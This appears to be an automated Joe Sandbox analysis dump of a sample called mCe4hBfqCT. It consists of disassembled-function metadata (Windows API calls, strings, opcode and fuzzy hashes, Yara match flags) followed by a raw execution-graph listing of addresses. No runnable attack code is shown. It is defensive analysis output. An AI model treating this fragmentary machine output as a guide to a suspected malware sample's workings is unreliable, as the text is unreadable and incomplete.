                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030229B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3103352999-0
                                                  • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction ID: f41db5a2379d23260eca06c95bb3a767dd221c2c6b8b66703f7ad7fa412458de
                                                  • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction Fuzzy Hash: C3E02B3400122567C754FBF59C48BBF77AC6B02722B640F2AF065D70E0EB68D10843AD
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                  • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                  • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                  • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0304B34B,?,00000050,?,?,?,?,?), ref: 0304B1CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction ID: bd603061f8c2bb78d982826715a913ee606507de65f28b3a0038d5f14502bb35
                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction Fuzzy Hash: E22165E2A42104A6EB64CE5C8D01B9773DEEB85A51F8A8574ED8BD7120F731DB01C290
                                                  APIs
                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: EncodersGdipImage$Size
                                                  • String ID: image/png
                                                  • API String ID: 864223233-2966254431
                                                  • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                  • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                  • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                  • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D,?,0301E0CD,0301C8E5,?,?,00000000,?,0301C7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0301C8E5), ref: 0301F236
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: 11@
                                                  • API String ID: 1452528299-1785270423
                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction ID: 18f04398a63b1543eba4a64272ebc63e6e85c99d0425ad440d428a1e30d0eee1
                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction Fuzzy Hash: 7311A13A301227AFCF169F64DC4896EFBA9FF09B15B044538FA15D6210CB709820DBE0
                                                  APIs
                                                    • Part of subcall function 03020F85: RtlEnterCriticalSection.NTDLL ref: 03020F86
                                                  • List.LIBCONCRT ref: 0302DBCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterListSection
                                                  • String ID: +$D$11@
                                                  • API String ID: 2909958271-3688954461
                                                  • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                  • Instruction ID: 25c27eb6a4931b0ad2e64043274d15251975a820620ef35d3a94079086425b70
                                                  • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                  • Instruction Fuzzy Hash: 2E212E79A01219CFCF05EF68C5949ADBBB1FF88310B158469E916AB351C770EE05CF90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: SpinWait
                                                  • String ID: 11@
                                                  • API String ID: 2810355486-1785270423
                                                  • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                  • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                  • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                  • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SpinWait
                                                  • String ID: 11@
                                                  • API String ID: 2810355486-1785270423
                                                  APIs
                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: String
                                                  • String ID: 11@$LCMapStringEx
                                                  • API String ID: 2568140703-3516914342
                                                  APIs
                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ___std_exception_destroy
                                                  • String ID: f(@$ios_base::failbit set
                                                  • API String ID: 4194217158-3705395444
                                                  APIs
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0302DCDA
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0302DCE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                  • String ID: 11@
                                                  • API String ID: 1687795959-1785270423
                                                  APIs
                                                  • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: DefaultUser
                                                  • String ID: 11@$GetUserDefaultLocaleName
                                                  • API String ID: 3358694519-96072240
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: 11@$IsValidLocaleName
                                                  • API String ID: 1901932003-3041995494
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalInitializeSectionSpin
                                                  • String ID: 11@$InitializeCriticalSectionEx
                                                  • API String ID: 2593887523-3358978645
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: H_prolog3_catch
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3886170330-2084237596
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Free
                                                  • String ID: 11@$FlsFree
                                                  • API String ID: 3978063606-2352678666
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Alloc
                                                  • String ID: 11@$FlsAlloc
                                                  • API String ID: 2773662609-288891599
                                                  APIs
                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428DA3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DCA
                                                    • Part of subcall function 0042862D: RaiseException.KERNEL32(?,?,0040D8A3,00000000,00000000,00000000,00000000,?,?,?,?,0040D8A3,00000000,0045617C,00000000), ref: 0042868D
                                                  Strings
                                                  • Access violation - no RTTI data!, xrefs: 00428D9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                  • String ID: Access violation - no RTTI data!
                                                  • API String ID: 2053020834-2158758863
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: 11@$FlsAlloc
                                                  • API String ID: 2742660187-288891599
                                                  APIs
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                  • String ID: pThreadProxy
                                                  • API String ID: 1687795959-3651400591
                                                  APIs
                                                  • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                  • Hash.LIBCONCRT ref: 0041A8AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                  • String ID: +hB
                                                  • API String ID: 3232699325-4272926976
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                  • GetLastError.KERNEL32 ref: 0042AF4E
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,03012ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,03012ACD,00000000), ref: 0303B1A7
                                                  • GetLastError.KERNEL32 ref: 0303B1B5
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,03012ACD,00000000), ref: 0303B210
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0

                                                  Execution Graph

                                                  Execution Coverage:6.5%
                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                  Signature Coverage:1%
                                                  Total number of Nodes:1419
                                                  Total number of Limit Nodes:28
416155 26599->26608 26601 4161c4 26600->26601 26607 401590 lstrcpy 26600->26607 26604 4161e9 26601->26604 26610 401590 lstrcpy 26601->26610 26609 416106 26603->26609 26611 416210 26604->26611 26617 401590 lstrcpy 26604->26617 27635 414f40 69 API calls moneypunct 26606->27635 26613 4161bf 26607->26613 26608->26592 26608->26596 27631 415100 71 API calls 26609->27631 26616 4161e4 26610->26616 26618 416220 26611->26618 26619 4162b3 26611->26619 27636 407710 125 API calls moneypunct 26613->27636 26615->26587 26615->26599 27637 415050 67 API calls moneypunct 26616->27637 26622 416209 26617->26622 26624 41a740 lstrcpy 26618->26624 26623 41a7a0 lstrcpy 26619->26623 27638 419010 54 API calls moneypunct 26622->27638 26626 4162c6 26623->26626 26627 416241 26624->26627 26628 401590 lstrcpy 26626->26628 26629 401590 lstrcpy 26627->26629 26631 4162da 26628->26631 26630 416255 26629->26630 27639 405960 39 API calls moneypunct 26630->27639 27642 405960 39 API calls moneypunct 26631->27642 26634 41625b 27640 4112d0 21 API calls moneypunct 26634->27640 26635 4162e0 27643 413560 36 API calls 26635->27643 26638 4162ab 26641 41a7a0 lstrcpy 26638->26641 26639 416266 26640 401590 lstrcpy 26639->26640 26642 4162a6 26640->26642 26643 4162fc 26641->26643 27641 413dc0 75 API calls 26642->27641 26645 401590 lstrcpy 26643->26645 26646 416310 26645->26646 27644 405960 39 API calls moneypunct 26646->27644 26648 41631c 26650 416338 26648->26650 27645 416630 9 API calls moneypunct 26648->27645 26650->26307 26654 404697 26651->26654 26652 4046ac 11 API calls 26652->26654 26653 40474f 6 API calls 26653->26311 26654->26652 26654->26653 26655->26398 26658 4010c2 moneypunct 26656->26658 26657 4010fd 26657->26428 26658->26657 26659 4010e2 VirtualFree 26658->26659 26659->26657 26661 401233 GlobalMemoryStatusEx 26660->26661 26661->26431 26662->26444 26664 41a7c2 26663->26664 26665 41a7ec 26664->26665 26666 41a7da lstrcpy 26664->26666 26665->26449 26666->26665 26668 41a740 lstrcpy 26667->26668 26669 416833 
26668->26669 26670 41a9b0 4 API calls 26669->26670 26671 416845 26670->26671 26672 41a8a0 lstrcpy 26671->26672 26673 41684e 26672->26673 26674 41a9b0 4 API calls 26673->26674 26675 416867 26674->26675 26676 41a8a0 lstrcpy 26675->26676 26677 416870 26676->26677 26678 41a9b0 4 API calls 26677->26678 26679 41688a 26678->26679 26680 41a8a0 lstrcpy 26679->26680 26681 416893 26680->26681 26682 41a9b0 4 API calls 26681->26682 26683 4168ac 26682->26683 26684 41a8a0 lstrcpy 26683->26684 26685 4168b5 26684->26685 26686 41a9b0 4 API calls 26685->26686 26687 4168cf 26686->26687 26688 41a8a0 lstrcpy 26687->26688 26689 4168d8 26688->26689 26690 41a9b0 4 API calls 26689->26690 26691 4168f3 26690->26691 26692 41a8a0 lstrcpy 26691->26692 26693 4168fc 26692->26693 26694 41a7a0 lstrcpy 26693->26694 26695 416910 26694->26695 26695->26456 26697 41a812 26696->26697 26697->26459 26699 41a83f 26698->26699 26700 415b54 26699->26700 26701 41a87b lstrcpy 26699->26701 26700->26469 26701->26700 26703 41a8a0 lstrcpy 26702->26703 26704 416443 26703->26704 26705 41a8a0 lstrcpy 26704->26705 26706 416455 26705->26706 26707 41a8a0 lstrcpy 26706->26707 26708 416467 26707->26708 26709 41a8a0 lstrcpy 26708->26709 26710 415b86 26709->26710 26710->26475 26712 4045c0 34 API calls 26711->26712 26713 4026b4 26712->26713 26714 4045c0 34 API calls 26713->26714 26715 4026d7 26714->26715 26716 4045c0 34 API calls 26715->26716 26717 4026f0 26716->26717 26718 4045c0 34 API calls 26717->26718 26719 402709 26718->26719 26720 4045c0 34 API calls 26719->26720 26721 402736 26720->26721 26722 4045c0 34 API calls 26721->26722 26723 40274f 26722->26723 26724 4045c0 34 API calls 26723->26724 26725 402768 26724->26725 26726 4045c0 34 API calls 26725->26726 26727 402795 26726->26727 26728 4045c0 34 API calls 26727->26728 26729 4027ae 26728->26729 26730 4045c0 34 API calls 26729->26730 26731 4027c7 26730->26731 26732 4045c0 34 API calls 26731->26732 26733 4027e0 26732->26733 26734 4045c0 34 API calls 26733->26734 26735 
4027f9 26734->26735 26736 4045c0 34 API calls 26735->26736 26737 402812 26736->26737 26738 4045c0 34 API calls 26737->26738 26739 40282b 26738->26739 26740 4045c0 34 API calls 26739->26740 26741 402844 26740->26741 26742 4045c0 34 API calls 26741->26742 26743 40285d 26742->26743 26744 4045c0 34 API calls 26743->26744 26745 402876 26744->26745 26746 4045c0 34 API calls 26745->26746 26747 40288f 26746->26747 26748 4045c0 34 API calls 26747->26748 26749 4028a8 26748->26749 26750 4045c0 34 API calls 26749->26750 26751 4028c1 26750->26751 26752 4045c0 34 API calls 26751->26752 26753 4028da 26752->26753 26754 4045c0 34 API calls 26753->26754 26755 4028f3 26754->26755 26756 4045c0 34 API calls 26755->26756 26757 40290c 26756->26757 26758 4045c0 34 API calls 26757->26758 26759 402925 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 40293e 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 402957 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 402970 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 402989 26766->26767 26768 4045c0 34 API calls 26767->26768 26769 4029a2 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 4029bb 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 4029d4 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 4029ed 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 402a06 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 402a1f 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 402a38 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 402a51 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 402a6a 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 402a83 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 402a9c 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 402ab5 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 402ace 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 402ae7 26794->26795 26796 4045c0 34 API calls 
26795->26796 26797 402b00 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 402b19 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 402b32 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 402b4b 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 402b64 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 402b7d 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 402b96 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 402baf 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 402bc8 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 402be1 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 402bfa 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 402c13 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 402c2c 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 402c45 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 402c5e 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 402c77 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 402c90 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 402ca9 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 402cc2 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 402cdb 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 402cf4 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 402d0d 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 402d26 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 402d3f 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 402d58 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 402d71 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 402d8a 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 402da3 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 402dbc 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 402dd5 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 402dee 26856->26857 26858 
4045c0 34 API calls 26857->26858 26859 402e07 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 402e20 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 402e39 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 402e52 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 402e6b 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 402e84 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 402e9d 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 402eb6 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 402ecf 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 402ee8 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 402f01 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 402f1a 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 402f33 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 402f4c 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 402f65 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 402f7e 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 402f97 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 402fb0 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 402fc9 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 402fe2 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 402ffb 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 403014 26900->26901 26902 4045c0 34 API calls 26901->26902 26903 40302d 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 403046 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 40305f 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 403078 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 403091 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 4030aa 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 4030c3 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 4030dc 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 4030f5 
26918->26919 26920 4045c0 34 API calls 26919->26920 26921 40310e 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 403127 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 403140 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 403159 26926->26927 26928 4045c0 34 API calls 26927->26928 26929 403172 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 40318b 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 4031a4 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 4031bd 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 4031d6 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 4031ef 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 403208 26940->26941 26942 4045c0 34 API calls 26941->26942 26943 403221 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 40323a 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 403253 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 40326c 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 403285 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 40329e 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 4032b7 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 4032d0 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 4032e9 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 403302 26960->26961 26962 4045c0 34 API calls 